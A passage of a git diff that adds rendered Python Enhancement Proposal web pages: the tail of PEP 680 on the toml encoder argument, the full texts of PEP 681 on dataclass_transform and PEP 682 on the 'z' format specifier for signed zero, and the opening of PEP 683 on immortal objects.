  11. toml.dump[s] support an encoder argument

    Note that we currently propose to not include a write API; however, if that +were to change, these differences would likely become relevant.

    +

    The encoder argument enables two use cases:

    +
      +
    • control over how custom types should be serialized, and
    • +
    • control over how output should be formatted.
    • +
    +

    The first is reasonable; however, we could only find two instances of +this on https://grep.app. One of these two used this ability to add +support for dumping decimal.Decimal, which a potential standard library +implementation would support out of the box. +If needed for other types, this use case could be well served by the +equivalent of the default argument in json.dump.

    +

    The second use case is enabled by allowing users to specify subclasses of +toml.TomlEncoder +and overriding methods to specify parts of the TOML writing process. The API +consists of five methods and exposes substantial implementation detail.

    +

    There is some usage of the encoder API on https://grep.app; however, it +appears to account for a tiny fraction of the overall usage of toml.

    +
  12. +
  13. Timezones

    toml uses and exposes custom toml.tz.TomlTz timezone objects. The +proposed implementation uses datetime.timezone objects from the standard +library.

    +
  14. +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0680.rst

+

Last modified: 2023-10-10 15:15:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0681/index.html b/pep-0681/index.html new file mode 100644 index 00000000000..bd8d6f31a3d --- /dev/null +++ b/pep-0681/index.html @@ -0,0 +1,872 @@ + + + + + + + + PEP 681 – Data Class Transforms | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 681 – Data Class Transforms

+
+
Author:
+
Erik De Bonte <erikd at microsoft.com>, +Eric Traut <erictr at microsoft.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
02-Dec-2021
+
Python-Version:
+
3.11
+
Post-History:
+
24-Apr-2021, +13-Dec-2021, +22-Feb-2022
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see The dataclass_transform decorator and +@typing.dataclass_transform for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 557 introduced the dataclass to the Python stdlib. Several popular +libraries have behaviors that are similar to dataclasses, but these +behaviors cannot be described using standard type annotations. Such +projects include attrs, pydantic, and object relational mapper (ORM) +packages such as SQLAlchemy and Django.

+

Most type checkers, linters and language servers have full support for +dataclasses. This proposal aims to generalize this functionality and +provide a way for third-party libraries to indicate that certain +decorator functions, classes, and metaclasses provide behaviors +similar to dataclasses.

+

These behaviors include:

+
    +
  • Synthesizing an __init__ method based on declared +data fields.
  • +
  • Optionally synthesizing __eq__, __ne__, __lt__, +__le__, __gt__ and __ge__ methods.
  • +
  • Supporting “frozen” classes, a way to enforce immutability during +static type checking.
  • +
  • Supporting “field specifiers”, which describe attributes of +individual fields that a static type checker must be aware of, +such as whether a default value is provided for the field.
  • +
+

The full behavior of the stdlib dataclass is described in the Python +documentation.

+

This proposal does not affect CPython directly except for the addition +of a dataclass_transform decorator in typing.py.

+
+
+

Motivation

+

There is no existing, standard way for libraries with dataclass-like +semantics to declare their behavior to type checkers. To work around +this limitation, Mypy custom plugins have been developed for many of +these libraries, but these plugins don’t work with other type +checkers, linters or language servers. They are also costly to +maintain for library authors, and they require that Python developers +know about the existence of these plugins and download and configure +them within their environment.

+
+
+

Rationale

+

The intent of this proposal is not to support every feature of every +library with dataclass-like semantics, but rather to make it possible +to use the most common features of these libraries in a way that is +compatible with static type checking. If a user values these libraries +and also values static type checking, they may need to avoid using +certain features or make small adjustments to the way they use them. +That’s already true for the Mypy custom plugins, which +don’t support every feature of every dataclass-like library.

+

As new features are added to dataclasses in the future, we intend, when +appropriate, to add support for those features on +dataclass_transform as well. Keeping these two feature sets in +sync will make it easier for dataclass users to understand and use +dataclass_transform and will simplify the maintenance of dataclass +support in type checkers.

+

Additionally, we will consider adding dataclass_transform support +in the future for features that have been adopted by multiple +third-party libraries but are not supported by dataclasses.

+
+
+

Specification

+
+

The dataclass_transform decorator

+

This specification introduces a new decorator function in +the typing module named dataclass_transform. This decorator +can be applied to either a function that is itself a decorator, +a class, or a metaclass. The presence of +dataclass_transform tells a static type checker that the decorated +function, class, or metaclass performs runtime “magic” that transforms +a class, endowing it with dataclass-like behaviors.

+

If dataclass_transform is applied to a function, using the decorated +function as a decorator is assumed to apply dataclass-like semantics. +If the function has overloads, the dataclass_transform decorator can +be applied to the implementation of the function or any one, but not more +than one, of the overloads. When applied to an overload, the +dataclass_transform decorator still impacts all usage of the +function.

+

If dataclass_transform is applied to a class, dataclass-like +semantics will be assumed for any class that directly or indirectly +derives from the decorated class or uses the decorated class as a +metaclass. Attributes on the decorated class and its base classes +are not considered to be fields.

+

Examples of each approach are shown in the following sections. Each +example creates a CustomerModel class with dataclass-like semantics. +The implementation of the decorated objects is omitted for brevity, +but we assume that they modify classes in the following ways:

+
    +
  • They synthesize an __init__ method using data fields declared +within the class and its parent classes.
  • +
  • They synthesize __eq__ and __ne__ methods.
  • +
+

Type checkers supporting this PEP will recognize that the +CustomerModel class can be instantiated using the synthesized +__init__ method:

+
# Using positional arguments
+c1 = CustomerModel(327, "John Smith")
+
+# Using keyword arguments
+c2 = CustomerModel(id=327, name="John Smith")
+
+# These calls will generate runtime errors and should be flagged as
+# errors by a static type checker.
+c3 = CustomerModel()
+c4 = CustomerModel(327, first_name="John")
+c5 = CustomerModel(327, "John Smith", 0)
+
+
+
+

Decorator function example

+
_T = TypeVar("_T")
+
+# The ``create_model`` decorator is defined by a library.
+# This could be in a type stub or inline.
+@typing.dataclass_transform()
+def create_model(cls: Type[_T]) -> Type[_T]:
+    cls.__init__ = ...
+    cls.__eq__ = ...
+    cls.__ne__ = ...
+    return cls
+
+# The ``create_model`` decorator can now be used to create new model
+# classes, like this:
+@create_model
+class CustomerModel:
+    id: int
+    name: str
+
+
+
+
+

Class example

+
# The ``ModelBase`` class is defined by a library. This could be in
+# a type stub or inline.
+@typing.dataclass_transform()
+class ModelBase: ...
+
+# The ``ModelBase`` class can now be used to create new model
+# subclasses, like this:
+class CustomerModel(ModelBase):
+    id: int
+    name: str
+
+
+
+
+

Metaclass example

+
# The ``ModelMeta`` metaclass and ``ModelBase`` class are defined by
+# a library. This could be in a type stub or inline.
+@typing.dataclass_transform()
+class ModelMeta(type): ...
+
+class ModelBase(metaclass=ModelMeta): ...
+
+# The ``ModelBase`` class can now be used to create new model
+# subclasses, like this:
+class CustomerModel(ModelBase):
+    id: int
+    name: str
+
+
+
+
+
+

Decorator function and class/metaclass parameters

+

A decorator function, class, or metaclass that provides dataclass-like +functionality may accept parameters that modify certain behaviors. +This specification defines the following parameters that static type +checkers must honor if they are used by a dataclass transform. Each of +these parameters accepts a bool argument, and it must be possible for +the bool value (True or False) to be statically evaluated.

+
    +
  • eq, order, frozen, init and unsafe_hash are parameters +supported in the stdlib dataclass, with meanings defined in +PEP 557.
  • +
  • kw_only, match_args and slots are parameters supported +in the stdlib dataclass, first introduced in Python 3.10.
  • +
+
+
+

dataclass_transform parameters

+

Parameters to dataclass_transform allow for some basic +customization of default behaviors:

+
_T = TypeVar("_T")
+
+def dataclass_transform(
+    *,
+    eq_default: bool = True,
+    order_default: bool = False,
+    kw_only_default: bool = False,
+    field_specifiers: tuple[type | Callable[..., Any], ...] = (),
+    **kwargs: Any,
+) -> Callable[[_T], _T]: ...
+
+
+
    +
  • eq_default indicates whether the eq parameter is assumed to +be True or False if it is omitted by the caller. If not specified, +eq_default will default to True (the default assumption for +dataclass).
  • +
  • order_default indicates whether the order parameter is +assumed to be True or False if it is omitted by the caller. If not +specified, order_default will default to False (the default +assumption for dataclass).
  • +
  • kw_only_default indicates whether the kw_only parameter is +assumed to be True or False if it is omitted by the caller. If not +specified, kw_only_default will default to False (the default +assumption for dataclass).
  • +
  • field_specifiers specifies a static list of supported classes +that describe fields. Some libraries also supply functions to +allocate instances of field specifiers, and those functions may +also be specified in this tuple. If not specified, +field_specifiers will default to an empty tuple (no field +specifiers supported). The standard dataclass behavior supports +only one type of field specifier called Field plus a helper +function (field) that instantiates this class, so if we were +describing the stdlib dataclass behavior, we would provide the +tuple argument (dataclasses.Field, dataclasses.field).
  • +
  • kwargs allows arbitrary additional keyword args to be passed to +dataclass_transform. This gives type checkers the freedom to +support experimental parameters without needing to wait for changes +in typing.py. Type checkers should report errors for any +unrecognized parameters.
  • +
+

In the future, we may add additional parameters to +dataclass_transform as needed to support common behaviors in user +code. These additions will be made after reaching consensus on +typing-sig rather than via additional PEPs.

+

The following sections provide additional examples showing how these +parameters are used.

+
+

Decorator function example

+
# Indicate that the ``create_model`` function assumes keyword-only
+# parameters for the synthesized ``__init__`` method unless it is
+# invoked with ``kw_only=False``. It always synthesizes order-related
+# methods and provides no way to override this behavior.
+@typing.dataclass_transform(kw_only_default=True, order_default=True)
+def create_model(
+    *,
+    frozen: bool = False,
+    kw_only: bool = True,
+) -> Callable[[Type[_T]], Type[_T]]: ...
+
+# Example of how this decorator would be used by code that imports
+# from this library:
+@create_model(frozen=True, kw_only=False)
+class CustomerModel:
+    id: int
+    name: str
+
+
+
+
+

Class example

+
# Indicate that classes that derive from this class default to
+# synthesizing comparison methods.
+@typing.dataclass_transform(eq_default=True, order_default=True)
+class ModelBase:
+    def __init_subclass__(
+        cls,
+        *,
+        init: bool = True,
+        frozen: bool = False,
+        eq: bool = True,
+        order: bool = True,
+    ):
+        ...
+
+# Example of how this class would be used by code that imports
+# from this library:
+class CustomerModel(
+    ModelBase,
+    init=False,
+    frozen=True,
+    eq=False,
+    order=False,
+):
+    id: int
+    name: str
+
+
+
+
+

Metaclass example

+
# Indicate that classes that use this metaclass default to
+# synthesizing comparison methods.
+@typing.dataclass_transform(eq_default=True, order_default=True)
+class ModelMeta(type):
+    def __new__(
+        cls,
+        name,
+        bases,
+        namespace,
+        *,
+        init: bool = True,
+        frozen: bool = False,
+        eq: bool = True,
+        order: bool = True,
+    ):
+        ...
+
+class ModelBase(metaclass=ModelMeta):
+    ...
+
+# Example of how this class would be used by code that imports
+# from this library:
+class CustomerModel(
+    ModelBase,
+    init=False,
+    frozen=True,
+    eq=False,
+    order=False,
+):
+    id: int
+    name: str
+
+
+
+
+
+

Field specifiers

+

Most libraries that support dataclass-like semantics provide one or +more “field specifier” types that allow a class definition to provide +additional metadata about each field in the class. This metadata can +describe, for example, default values, or indicate whether the field +should be included in the synthesized __init__ method.

+

Field specifiers can be omitted in cases where additional metadata is +not required:

+
@dataclass
+class Employee:
+    # Field with no specifier
+    name: str
+
+    # Field that uses field specifier class instance
+    age: Optional[int] = field(default=None, init=False)
+
+    # Field with type annotation and simple initializer to
+    # describe default value
+    is_paid_hourly: bool = True
+
+    # Not a field (but rather a class variable) because type
+    # annotation is not provided.
+    office_number = "unassigned"
+
+
+
+

Field specifier parameters

+

Libraries that support dataclass-like semantics and support field +specifier classes typically use common parameter names to construct +these field specifiers. This specification formalizes the names and +meanings of the parameters that must be understood for static type +checkers. These standardized parameters must be keyword-only.

+

These parameters are a superset of those supported by +dataclasses.field, excluding those that do not have an impact on +type checking such as compare and hash.

+

Field specifier classes are allowed to use other +parameters in their constructors, and those parameters can be +positional and may use other names.

+
    +
  • init is an optional bool parameter that indicates whether the +field should be included in the synthesized __init__ method. If +unspecified, init defaults to True. Field specifier functions +can use overloads that implicitly specify the value of init +using a literal bool value type +(Literal[False] or Literal[True]).
  • +
  • default is an optional parameter that provides the default value +for the field.
  • +
  • default_factory is an optional parameter that provides a runtime +callback that returns the default value for the field. If neither +default nor default_factory are specified, the field is +assumed to have no default value and must be provided a value when +the class is instantiated.
  • +
  • factory is an alias for default_factory. Stdlib dataclasses +use the name default_factory, but attrs uses the name factory +in many scenarios, so this alias is necessary for supporting attrs.
  • +
  • kw_only is an optional bool parameter that indicates whether the +field should be marked as keyword-only. If true, the field will be +keyword-only. If false, it will not be keyword-only. If unspecified, +the value of the kw_only parameter on the object decorated with +dataclass_transform will be used, or if that is unspecified, the +value of kw_only_default on dataclass_transform will be used.
  • +
  • alias is an optional str parameter that provides an alternative +name for the field. This alternative name is used in the synthesized +__init__ method.
  • +
+

It is an error to specify more than one of default, +default_factory and factory.

+

This example demonstrates the above:

+
# Library code (within type stub or inline)
+# In this library, passing a resolver means that init must be False,
+# and the overload with Literal[False] enforces that.
+@overload
+def model_field(
+        *,
+        default: Optional[Any] = ...,
+        resolver: Callable[[], Any],
+        init: Literal[False] = False,
+    ) -> Any: ...
+
+@overload
+def model_field(
+        *,
+        default: Optional[Any] = ...,
+        resolver: None = None,
+        init: bool = True,
+    ) -> Any: ...
+
+@typing.dataclass_transform(
+    kw_only_default=True,
+    field_specifiers=(model_field, ))
+def create_model(
+    *,
+    init: bool = True,
+) -> Callable[[Type[_T]], Type[_T]]: ...
+
+# Code that imports this library:
+@create_model(init=False)
+class CustomerModel:
+    id: int = model_field(resolver=lambda : 0)
+    name: str
+
+
+
+
+
+

Runtime behavior

+

At runtime, the dataclass_transform decorator’s only effect is to +set an attribute named __dataclass_transform__ on the decorated +function or class to support introspection. The value of the attribute +should be a dict mapping the names of the dataclass_transform +parameters to their values.

+

For example:

+
{
+  "eq_default": True,
+  "order_default": False,
+  "kw_only_default": False,
+  "field_specifiers": (),
+  "kwargs": {}
+}
+
+
+
+
+

Dataclass semantics

+

Except where stated otherwise in this PEP, classes impacted by +dataclass_transform, either by inheriting from a class that is +decorated with dataclass_transform or by being decorated with +a function decorated with dataclass_transform, are assumed to +behave like stdlib dataclass.

+

This includes, but is not limited to, the following semantics:

+
    +
  • Frozen dataclasses cannot inherit from non-frozen dataclasses. A +class that has been decorated with dataclass_transform is +considered neither frozen nor non-frozen, thus allowing frozen +classes to inherit from it. Similarly, a class that directly +specifies a metaclass that is decorated with dataclass_transform +is considered neither frozen nor non-frozen.

    Consider these class examples:

    +
    # ModelBase is not considered either "frozen" or "non-frozen"
    +# because it is decorated with ``dataclass_transform``
    +@typing.dataclass_transform()
    +class ModelBase(): ...
    +
    +# Vehicle is considered non-frozen because it does not specify
    +# "frozen=True".
    +class Vehicle(ModelBase):
    +    name: str
    +
    +# Car is a frozen class that derives from Vehicle, which is a
    +# non-frozen class. This is an error.
    +class Car(Vehicle, frozen=True):
    +    wheel_count: int
    +
    +
    +

    And these similar metaclass examples:

    +
    @typing.dataclass_transform()
    +class ModelMeta(type): ...
    +
    +# ModelBase is not considered either "frozen" or "non-frozen"
    +# because it directly specifies ModelMeta as its metaclass.
    +class ModelBase(metaclass=ModelMeta): ...
    +
    +# Vehicle is considered non-frozen because it does not specify
    +# "frozen=True".
    +class Vehicle(ModelBase):
    +    name: str
    +
    +# Car is a frozen class that derives from Vehicle, which is a
    +# non-frozen class. This is an error.
    +class Car(Vehicle, frozen=True):
    +    wheel_count: int
    +
    +
    +
  • +
  • Field ordering and inheritance is assumed to follow the rules +specified in 557. This includes the effects of +overrides (redefining a field in a child class that has already been +defined in a parent class).
  • +
  • PEP 557 indicates that +all fields without default values must appear before +fields with default values. Although not explicitly +stated in PEP 557, this rule is ignored when init=False, and +this specification likewise ignores this requirement in that +situation. Likewise, there is no need to enforce this ordering when +keyword-only parameters are used for __init__, so the rule is +not enforced if kw_only semantics are in effect.
  • +
  • As with dataclass, method synthesis is skipped if it would +overwrite a method that is explicitly declared within the class. +Method declarations on base classes do not cause method synthesis to +be skipped.

    For example, if a class declares an __init__ method explicitly, +an __init__ method will not be synthesized for that class.

    +
  • +
  • KW_ONLY sentinel values are supported as described in the Python +docs and bpo-43532.
  • +
  • ClassVar attributes are not considered dataclass fields and are +ignored by dataclass mechanisms.
  • +
+
+
+

Undefined behavior

+

If multiple dataclass_transform decorators are found, either on a +single function (including its overloads), a single class, or within a +class hierarchy, the resulting behavior is undefined. Library authors +should avoid these scenarios.

+
+
+
+

Reference Implementation

+

Pyright contains the reference implementation of type +checker support for dataclass_transform. Pyright’s +dataClasses.ts source file would be a good +starting point for understanding the implementation.

+

The attrs and pydantic +libraries are using dataclass_transform and serve as real-world +examples of its usage.

+
+
+

Rejected Ideas

+
+

auto_attribs parameter

+

The attrs library supports an auto_attribs parameter that +indicates whether class members decorated with PEP 526 variable +annotations but with no assignment should be treated as data fields.

+

We considered supporting auto_attribs and a corresponding +auto_attribs_default parameter, but decided against this because it +is specific to attrs.

+

Django does not support declaring fields using type annotations only, +so Django users who leverage dataclass_transform should be aware +that they should always supply assigned values.

+
+
+

cmp parameter

+

The attrs library supports a bool parameter cmp that is equivalent +to setting both eq and order to True. We chose not to support +a cmp parameter, since it only applies to attrs. Users can emulate +the cmp behaviour by using the eq and order parameter names +instead.

+
+
+

Automatic field name aliasing

+

The attrs library performs automatic aliasing of +field names that start with a single underscore, stripping the +underscore from the name of the corresponding __init__ parameter.

+

This proposal omits that behavior since it is specific to attrs. Users +can manually alias these fields using the alias parameter.

+
+
+

Alternate field ordering algorithms

+

The attrs library currently supports two approaches to ordering the +fields within a class:

+
    +
  • Dataclass order: The same ordering used by dataclasses. This is the +default behavior of the older APIs (e.g. attr.s).
  • +
  • Method Resolution Order (MRO): This is the default behavior of the +newer APIs (e.g. define, mutable, frozen). Older APIs (e.g. attr.s) +can opt into this behavior by specifying collect_by_mro=True.
  • +
+

The resulting field orderings can differ in certain diamond-shaped +multiple inheritance scenarios.

+

For simplicity, this proposal does not support any field ordering +other than that used by dataclasses.

+
+
+

Fields redeclared in subclasses

+

The attrs library differs from stdlib dataclasses in how it +handles inherited fields that are redeclared in subclasses. The +dataclass specification preserves the original order, but attrs +defines a new order based on subclasses.

+

For simplicity, we chose to only support the dataclass behavior. +Users of attrs who rely on the attrs-specific ordering will not see +the expected order of parameters in the synthesized __init__ +method.

+
+
+

Django primary and foreign keys

+

Django applies additional logic for primary and foreign keys. For example, it automatically adds an id field +(and __init__ parameter) if there is no field designated as a +primary key.

+

As this is not broadly applicable to dataclass libraries, this +additional logic is not accommodated with this proposal, so +users of Django would need to explicitly declare the id field.

+
+
+

Class-wide default values

+

SQLAlchemy requested that we expose a way to specify that the default +value of all fields in the transformed class is None. It is typical +that all SQLAlchemy fields are optional, and None indicates that +the field is not set.

+

We chose not to support this feature, since it is specific to +SQLAlchemy. Users can manually set default=None on these fields +instead.

+
+
+

Descriptor-typed field support

+

We considered adding a boolean parameter on dataclass_transform +to enable better support for fields with descriptor types, which is +common in SQLAlchemy. When enabled, the type of each parameter on the +synthesized __init__ method corresponding to a descriptor-typed +field would be the type of the value parameter to the descriptor’s +__set__ method rather than the descriptor type itself. Similarly, +when setting the field, the __set__ value type would be expected. +And when getting the value of the field, its type would be expected to +match the return type of __get__.

+

This idea was based on the belief that dataclass did not properly +support descriptor-typed fields. In fact it does, but type checkers +(at least mypy and pyright) did not reflect the runtime behavior which +led to our misunderstanding. For more details, see the +Pyright bug.

+
+
+

converter field specifier parameter

+

The attrs library supports a converter field specifier parameter, +which is a Callable that is called by the generated +__init__ method to convert the supplied value to some other +desired value. This is tricky to support since the parameter type in +the synthesized __init__ method needs to accept uncovered values, +but the resulting field is typed according to the output of the +converter.

+

Some aspects of this issue are detailed in a +Pyright discussion.

+

There may be no good way to support this because there’s not enough +information to derive the type of the input parameter. One possible +solution would be to add support for a converter field specifier +parameter but then use the Any type for the corresponding +parameter in the __init__ method.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0681.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0682/index.html b/pep-0682/index.html new file mode 100644 index 00000000000..ae399ab4a5f --- /dev/null +++ b/pep-0682/index.html @@ -0,0 +1,309 @@ + + + + + + + + PEP 682 – Format Specifier for Signed Zero | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 682 – Format Specifier for Signed Zero

+
+
Author:
+
John Belmonte <john at neggie.net>
+
Sponsor:
+
Mark Dickinson <dickinsm at gmail.com>
+
PEP-Delegate:
+
Mark Dickinson
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Jan-2022
+
Python-Version:
+
3.11
+
Post-History:
+
08-Feb-2022
+
Resolution:
+
Discourse thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

Though float and Decimal types can represent signed zero, in many +fields of mathematics negative zero is surprising or unwanted – especially +in the context of displaying an (often rounded) numerical result. This PEP +proposes an extension to the string format specification allowing negative +zero to be normalized to positive zero.

+
+
+

Motivation

+

Here is negative zero:

+
>>> x = -0.
+>>> x
+-0.0
+
+
+

When formatting a number, negative zero can result from rounding. Assuming +the user’s intention is truly to discard precision, the distinction between +negative and positive zero of the rounded result might be considered an +unwanted artifact:

+
>>> for x in (.002, -.001, .060):
+...     print(f'{x: .1f}')
+ 0.0
+-0.0
+ 0.1
+
+
+

There are various approaches to clearing the sign of a negative zero. It +can be achieved without a conditional by adding positive zero:

+
>>> x = -0.
+>>> x + 0.
+0.0
+
+
+

To normalize negative zero when formatting, it is necessary to perform +a redundant (and error-prone) pre-rounding of the input:

+
>>> for x in (.002, -.001, .060):
+...     print(f'{round(x, 1) + 0.: .1f}')
+ 0.0
+ 0.0
+ 0.1
+
+
+

There is ample evidence that, regardless of the language, programmers are +often looking for a way to suppress negative zero, and landing on a +variety of workarounds (pre-round, post-regex, etc.). A sampling:

+ +

What we would like instead is a first-class option to normalize negative +zero, on top of everything else that numerical string formatting already +offers.

+
+
+

Rationale

+

There are use cases where negative zero is unwanted in formatted number +output – arguably, not wanting it is more common. Expanding the format +specification is the best way to support this because number formatting +already incorporates rounding, and the normalization of negative zero must +happen after rounding.

+

While it is possible to pre-round and normalize a number before formatting, +it’s tedious and prone to error if the rounding doesn’t precisely match +that of the format spec. Furthermore, functions that wrap formatting would +find themselves having to parse format specs to extract the precision +information. For example, consider how this utility for formatting +one-dimensional numerical arrays would be complicated by such pre-rounding:

+
def format_vector(v, format_spec='8.2f'):
+    """Format a vector (any iterable) using given per-term format string."""
+    return f"[{','.join(f'{term:{format_spec}}' for term in v)}]"
+
+
+

To date, there doesn’t appear to be any other widely-used language or library +providing a formatting option for negative zero. However, the same z +option syntax and semantics specified below have been proposed for C++ +std::format(). While the proposal was withdrawn for C++20, a consensus +proposal is promised for C++23. (The original feature request prompting +this PEP was argued without knowledge of the C++ proposal.)

+

When Rust developers debated whether to suppress negative zero in print +output, they took a small survey of other languages. Notably, it didn’t +mention any language providing an option for negative zero handling.

+
+
+

Specification

+

An optional, literal z is added to the +Format Specification Mini-Language following sign:

+
[[fill]align][sign][z][#][0][width][grouping_option][.precision][type]
+
+
+

where z is allowed for floating-point presentation types (f, g, +etc., as defined by the format specification documentation). Support for +z is provided by the .__format__() method of each numeric type, +allowing the specifier to be used in f-strings, built-in format(), and +str.format().

+

When z is present, negative zero (whether the original value or the +result of rounding) will be normalized to positive zero.

+

Synopsis:

+
>>> x = -.00001
+>>> f'{x:z.1f}'
+'0.0'
+
+>>> x = decimal.Decimal('-.00001')
+>>> '{:+z.1f}'.format(x)
+'+0.0'
+
+
+
+

Design Notes

+

The solution must be opt-in, because we can’t change the behavior of +programs that may be expecting or relying on negative zero when formatting +numbers.

+

The proposed extension is intentionally [sign][z] rather than +[sign[z]]. The default for sign (-) is not widely known or +explicitly written, so this avoids everyone having to learn it just to use +the z option.

+

While f-strings, built-in format(), and str.format() can access +the new option, %-formatting cannot. There is already precedent for not +extending %-formatting with new options, as was the case for the +, option (PEP 378).

+

C99 printf already uses the z option character for another +purpose: qualifying the unsigned type (u) to match the length of +size_t. However, since the signed zero option specifically disallows +z for integer presentation types, it’s possible to disambiguate the two +uses, should C want to adopt this new option.

+
+
+
+

Backwards Compatibility

+

The new formatting behavior is opt-in, so numerical formatting of existing +programs will not be affected.

+
+
+

How to Teach This

+

A typical introductory Python course will not cover string formatting +in full detail. For such a course, no adjustments would need to be made. +For a course that does go into details of the string format specification, +a single example demonstrating the effect of the z option on a negative +value that’s rounded to zero by the formatting should be enough. For an +independent developer encountering the feature in someone else’s code, +reference to the Format Specification Mini-Language section of the +library reference manual should suffice.

+
+
+

Reference Implementation

+

A reference implementation exists at pull request #30049.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0682.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0683/index.html b/pep-0683/index.html new file mode 100644 index 00000000000..e7030aee1e5 --- /dev/null +++ b/pep-0683/index.html @@ -0,0 +1,1018 @@ + + + + + + + + PEP 683 – Immortal Objects, Using a Fixed Refcount | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 683 – Immortal Objects, Using a Fixed Refcount

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>, Eddie Elizondo <eduardo.elizondorueda at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2022
+
Python-Version:
+
3.12
+
Post-History:
+
16-Feb-2022, +19-Feb-2022, +28-Feb-2022, +12-Aug-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at reference count.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

PEP Acceptance Conditions

+

The PEP was accepted with conditions:

+
    +
  • the primary proposal in Solutions for Accidental De-Immortalization +(reset the immortal refcount in tp_dealloc()) was applied
  • +
  • types without this were not immortalized (in CPython’s code)
  • +
  • the PEP was updated with final benchmark results once +the implementation is finalized (confirming the change is worthwhile)
  • +
+
+
+

Abstract

+

Currently the CPython runtime maintains a +small amount of mutable state in the +allocated memory of each object. Because of this, otherwise immutable +objects are actually mutable. This can have a large negative impact +on CPU and memory performance, especially for approaches to increasing +Python’s scalability.

+

This proposal mandates that, internally, CPython will support marking +an object as one for which that runtime state will no longer change. +Consequently, such an object’s refcount will never reach 0, and thus +the object will never be cleaned up (except when the runtime knows +it’s safe to do so, like during runtime finalization). +We call these objects “immortal”. (Normally, only a relatively small +number of internal objects will ever be immortal.) +The fundamental improvement here is that now an object +can be truly immutable.

+
+

Scope

+

Object immortality is meant to be an internal-only feature, so this +proposal does not include any changes to public API or behavior +(with one exception). As usual, we may still add some private +(yet publicly accessible) API to do things like immortalize an object +or tell if one is immortal. Any effort to expose this feature to users +would need to be proposed separately.

+

There is one exception to “no change in behavior”: refcounting semantics +for immortal objects will differ in some cases from user expectations. +This exception, and the solution, are discussed below.

+

Most of this PEP focuses on an internal implementation that satisfies +the above mandate. However, those implementation details are not meant +to be strictly proscriptive. Instead, at the least they are included +to help illustrate the technical considerations required by the mandate. +The actual implementation may deviate somewhat as long as it satisfies +the constraints outlined below. Furthermore, the acceptability of any +specific implementation detail described below does not depend on +the status of this PEP, unless explicitly specified.

+

For example, the particular details of:

+
    +
  • how to mark something as immortal
  • +
  • how to recognize something as immortal
  • +
  • which subset of functionally immortal objects are marked as immortal
  • +
  • which memory-management activities are skipped or modified for immortal objects
  • +
+

are not only CPython-specific but are also private implementation +details that are expected to change in subsequent versions.

+
+
+

Implementation Summary

+

Here’s a high-level look at the implementation:

+

If an object’s refcount matches a very specific value (defined below) +then that object is treated as immortal. The CPython C-API and runtime +will not modify the refcount (or other runtime state) of an immortal +object. The runtime will now be explicitly responsible for deallocating +all immortal objects during finalization, unless statically allocated. +(See Object Cleanup below.)

+

Aside from the change to refcounting semantics, there is one other +possible negative impact to consider. The threshold for an “acceptable” +performance penalty for immortal objects is 2% (the consensus at the +2022 Language Summit). A naive implementation of the approach described +below makes CPython roughly 4% slower. However, the implementation +is ~performance-neutral~ once known mitigations are applied.

+

TODO: Update the performance impact for the latest branch +(both for GCC and for clang).

+
+
+
+

Motivation

+

As noted above, currently all objects are effectively mutable. That +includes “immutable” objects like str instances. This is because +every object’s refcount is frequently modified as the object is used +during execution. This is especially significant for a number of +commonly used global (builtin) objects, e.g. None. Such objects +are used a lot, both in Python code and internally. That adds up to +a consistent high volume of refcount changes.

+

The effective mutability of all Python objects has a concrete impact +on parts of the Python community, e.g. projects that aim for +scalability like Instagram or the effort to make the GIL +per-interpreter. Below we describe several ways in which refcount +modification has a real negative effect on such projects. +None of that would happen for objects that are truly immutable.

+
+

Reducing CPU Cache Invalidation

+

Every modification of a refcount causes the corresponding CPU cache +line to be invalidated. This has a number of effects.

+

For one, the write must be propagated to other cache levels +and to main memory. This has small effect on all Python programs. +Immortal objects would provide a slight relief in that regard.

+

On top of that, multi-core applications pay a price. If two threads +(running simultaneously on distinct cores) are interacting with the +same object (e.g. None) then they will end up invalidating each +other’s caches with each incref and decref. This is true even for +otherwise immutable objects like True, 0, and str instances. +CPython’s GIL helps reduce this effect, since only one thread runs at a +time, but it doesn’t completely eliminate the penalty.

+
+
+

Avoiding Data Races

+

Speaking of multi-core, we are considering making the GIL +a per-interpreter lock, which would enable true multi-core parallelism. +Among other things, the GIL currently protects against races between +multiple concurrent threads that may incref or decref the same object. +Without a shared GIL, two running interpreters could not safely share +any objects, even otherwise immutable ones like None.

+

This means that, to have a per-interpreter GIL, each interpreter must +have its own copy of every object. That includes the singletons and +static types. We have a viable strategy for that but it will require +a meaningful amount of extra effort and extra complexity.

+

